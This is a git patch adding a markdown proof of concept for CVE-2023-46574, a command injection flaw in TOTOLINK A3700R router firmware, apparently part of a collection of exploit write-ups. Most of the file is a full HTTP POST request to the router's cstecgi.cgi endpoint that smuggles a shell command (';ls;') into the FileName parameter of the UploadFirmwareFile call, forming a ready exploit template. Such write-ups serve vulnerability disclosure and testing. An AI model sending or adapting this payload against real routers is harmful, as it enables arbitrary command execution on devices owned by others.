From 39900f8b3789b5400cc3b8cc1c98cbc230c2a4f8 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 26 Nov 2023 11:50:37 +0800
Subject: [PATCH] =?UTF-8?q?Create=20TOTOLINK=20A3700R=E5=91=BD=E4=BB=A4?=
 =?UTF-8?q?=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9ECVE-2023-46574.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md | 33 ++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md

diff --git a/TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md b/TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md
new file mode 100644
index 0000000..47e90eb
--- /dev/null
+++ b/TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md	
@@ -0,0 +1,33 @@
+
+## TOTOLINK A3700R命令执行漏洞CVE-2023-46574
+TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞，攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。   
+
+## 影响版本：
+```
+TOTOLINK A3700R v9.1.2u.6165_20211012
+```
+
+
+## poc
+```
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Host: 192.168.122.15
+Content-Length: 73
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://192.168.122.15
+Referer: http://192.168.122.15/basic/index.html?time=1697964093345
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: SESSION_ID=2:1697964047:2
+Connection: close
+
+
+{"topicurl":"UploadFirmwareFile","FileName":";ls;"}
+```
+![image](https://github.com/wy876/POC/assets/139549762/37a0b1f8-101e-4642-b9fa-3fda6f31f079)
+
+## 来源
+- https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md